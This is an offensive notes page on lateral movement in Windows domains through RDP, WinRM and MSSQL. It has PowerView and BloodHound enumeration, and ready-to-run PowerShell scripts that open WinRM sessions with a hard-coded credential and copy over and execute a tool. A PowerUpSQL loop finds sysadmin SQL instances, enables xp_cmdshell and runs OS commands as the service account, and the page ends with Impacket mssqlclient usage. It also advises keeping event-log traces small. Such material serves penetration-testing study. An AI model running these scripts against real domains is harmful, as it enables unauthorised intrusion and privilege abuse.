A Few Lateral Movement Techniques
Lateral movement inside a Windows domain can be done through:
- RDP: Provides GUI access to a remote host.
- PowerShell Remoting (WinRM): Enables remote command execution.
- MSSQL Server: logins with the sysadmin role can run queries remotely and, through xp_cmdshell, OS commands as the SQL Server service account.
Enumeration is easiest with BloodHound, which maps these three rights as the CanRDP, CanPSRemote and SQLAdmin edges.
RDP
# Enumerate
## PowerView Command
Get-NetLocalGroupMember -ComputerName <WORKSTATION-NAME> -GroupName "Remote Desktop Users"
## BloodHound is the quickest way to enumerate this domain-wide: the CanRDP edge is built from the same local group membership
WinRM
# Enumerate
## PowerView Command
Get-NetLocalGroupMember -ComputerName <WORKSTATION-NAME> -GroupName "Remote Management Users"
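The two PowerView one-liners above (RDP and WinRM) only check one host and one group at a time. The following added example, which is not part of the original notes, sweeps a list of hosts for both local groups in one pass and keeps only domain principals, which is what matters when looking for the next hop. It assumes PowerView.ps1 is in the current directory, that the calling account may read the remote SAM (normally local admin on the target, as with the commands above), and that the host names and CSV path are placeholders.

```powershell
# Added example: enumerate RDP and WinRM access across several hosts with PowerView.
# Assumptions: .\PowerView.ps1 exists; host names below are constructed placeholders.
Import-Module .\PowerView.ps1

$Targets = @('WS01', 'WS02', 'SRV01')          # constructed host list
$Groups  = @{
    'Remote Desktop Users'    = 'RDP'          # maps to BloodHound's CanRDP edge
    'Remote Management Users' = 'WinRM'        # maps to BloodHound's CanPSRemote edge
}

$Results = foreach ($Computer in $Targets) {
    foreach ($Group in $Groups.Keys) {
        try {
            # PowerView returns ComputerName, GroupName, MemberName, SID, IsGroup, IsDomain
            Get-NetLocalGroupMember -ComputerName $Computer -GroupName $Group -ErrorAction Stop |
                ForEach-Object {
                    [pscustomobject]@{
                        ComputerName = $_.ComputerName
                        Access       = $Groups[$Group]
                        Member       = $_.MemberName
                        IsGroup      = $_.IsGroup    # a domain group here grants access to all of its members
                        IsDomain     = $_.IsDomain   # $false means a machine-local account: not usable for movement
                    }
                }
        }
        catch {
            # Unreachable host, RPC filtered, or no rights to read the remote SAM
            Write-Warning "$Computer / $Group : $($_.Exception.Message)"
        }
    }
}

# Domain principals only; sorted so each host's RDP and WinRM entries sit together
$Results | Where-Object { $_.IsDomain } | Sort-Object ComputerName, Access | Format-Table -AutoSize
$Results | Export-Csv -NoTypeInformation -Path .\remote-access.csv
```

Cross-reference the Member column against groups the current user belongs to (`whoami /groups`): a nested domain group with IsGroup set is often the access path that a per-user BloodHound view hides.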
We can use the following Cypher query to hunt for CanPSRemote privileges (the first MATCH only restricts the result to users that belong to at least one group; the second returns the CanPSRemote paths).
BloodHound Cypher query
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
WinRM Session
- PowerShell
- Linux
# Build a credential object from a plaintext password (placeholder values)
$Pass = ConvertTo-SecureString "Coolpass123@" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential ("REZYDEV\jethalal", $Pass)
# Interactive shell on the target over WinRM (TCP 5985, or 5986 for HTTPS); the account
# must be in Remote Management Users or local Administrators on that host
Enter-PSSession -ComputerName <WORKSTATION-NAME> -Credential $Cred
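Enter-PSSession gives an interactive prompt, which is awkward for scripting. The following added example (not from the original notes) does the same hop non-interactively: it checks that the WinRM listener answers, opens one persistent session with the same credential, confirms who we are and whether we are a local admin on the target, pushes a file through the session without SMB, and runs it. The target name WS01 and the tool path are placeholders.

```powershell
# Added example: non-interactive WinRM lateral movement with an explicit credential.
# Assumptions: credential values are the placeholders from the notes above; WS01 and
# C:\Tools\tool.exe are constructed; PowerShell 5.0+ on both sides (Copy-Item -ToSession).
$Pass   = ConvertTo-SecureString "Coolpass123@" -AsPlainText -Force
$Cred   = New-Object System.Management.Automation.PSCredential ("REZYDEV\jethalal", $Pass)
$Target = 'WS01'

# Fail early if nothing is listening on WinRM; Identify requests need no credentials
if (-not (Test-WSMan -ComputerName $Target -ErrorAction SilentlyContinue)) {
    throw "WinRM not reachable on $Target"
}

# One persistent session keeps state between commands and avoids re-authenticating per call
$Session = New-PSSession -ComputerName $Target -Credential $Cred -ErrorAction Stop
try {
    # Who are we on the remote host, and does the token carry local Administrators?
    $Info = Invoke-Command -Session $Session -ScriptBlock {
        $Id = [Security.Principal.WindowsIdentity]::GetCurrent()
        $P  = New-Object Security.Principal.WindowsPrincipal($Id)
        [pscustomobject]@{
            Host    = $env:COMPUTERNAME
            User    = $Id.Name
            IsAdmin = $P.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        }
    }
    $Info | Format-List

    # Push a file over the session itself (no SMB share, no admin$ needed) and run it
    Copy-Item -Path C:\Tools\tool.exe -Destination C:\Windows\Temp\tool.exe -ToSession $Session
    Invoke-Command -Session $Session -ScriptBlock { & C:\Windows\Temp\tool.exe --help }

    # Caveat: this is a network logon, so the remote session holds no reusable credentials.
    # Reaching a third host from inside it (the "double hop") fails unless CredSSP or
    # Kerberos delegation is configured for the target.
}
finally {
    Remove-PSSession -Session $Session
}
```

Each Invoke-Command lands in the target's event log as a WinRM operational event plus a 4624 logon type 3, so prefer one session with a few calls over many short-lived ones.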
SQL Server Admin
BloodHound
We can check for SQL Admin rights in the Node Info tab of a given user.
BloodHound Cypher query
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
PowerUpSQL
# Enumerate
## Instances are discovered from the MSSQLSvc/ service principal names registered in the domain
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
# Authenticate
## -Username/-Password perform SQL Server authentication (a SQL login); omit both to
## use the current Windows token instead (Integrated Security)
Get-SQLQuery -Verbose -Instance "192.168.1.7,1433" -Username "rezydev\jethalal" -Password "SQLPassword123@" -Query 'Select @@version'
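The PowerUpSQL commands above discover instances and run a single query. The following added example (not from the original notes) carries the SQLAdmin path through to its end: it keeps only the instances the current domain user can log in to, checks on each whether that login is sysadmin, and on those that are it enables xp_cmdshell, runs a command as the SQL Server service account and disables xp_cmdshell again. It assumes PowerUpSQL.ps1 is in the current directory and that the session already runs as a domain user, so Windows authentication is used rather than the -Username/-Password SQL login shown above.

```powershell
# Added example: SPN discovery -> accessible instances -> sysadmin check -> OS command via xp_cmdshell.
# Assumptions: .\PowerUpSQL.ps1 exists; instance names come from the SPNs, none are hard-coded.
Import-Module .\PowerUpSQL.ps1

# 1. Instances from SPNs, then only those that accept our Windows token
$Live = Get-SQLInstanceDomain |
        Get-SQLConnectionTestThreaded -Threads 10 |
        Where-Object { $_.Status -eq 'Accessible' }

foreach ($Db in $Live) {
    $Inst = $Db.Instance

    # 2. IS_SRVROLEMEMBER returns 1 when the current login holds the sysadmin role
    $Role = Get-SQLQuery -Instance $Inst -Query "SELECT IS_SRVROLEMEMBER('sysadmin') AS sa, SUSER_SNAME() AS login"
    Write-Host ("{0,-35} login={1} sysadmin={2}" -f $Inst, $Role.login, $Role.sa)
    if ($Role.sa -ne 1) { continue }

    # 3. xp_cmdshell is an advanced option and off by default; enabling it is a sysadmin-only,
    #    logged configuration change. PowerUpSQL's Invoke-SQLOSCmd wraps these same statements.
    Get-SQLQuery -Instance $Inst -Query @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
"@ | Out-Null

    # 4. Command runs in the context of the SQL Server service account; result column is "output"
    $Out = Get-SQLQuery -Instance $Inst -Query "EXEC xp_cmdshell 'whoami'"
    $Out.output |
        Where-Object { $_ -is [string] -and $_.Trim() } |   # drop the trailing NULL row
        ForEach-Object { Write-Host "  [$Inst] $_" }

    # 5. Restore the original setting
    Get-SQLQuery -Instance $Inst -Query "EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;" | Out-Null
}
```

The whoami line is the interesting result: when the service runs as a domain account rather than a virtual account, every command here executes with that account's domain privileges, which is what turns a SQL sysadmin right into a host-level foothold.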
Impacket's MSSQLClient.py
python3 /path/to/mssqlclient.py REZYDEV/MSSQLSRV@192.168.1.7
## Add -windows-auth to authenticate with Windows authentication (NTLM) instead of a SQL login.
## Without it the REZYDEV/ prefix is ignored and MSSQLSRV is tried as a SQL username;
## with no password on the command line the script prompts for one.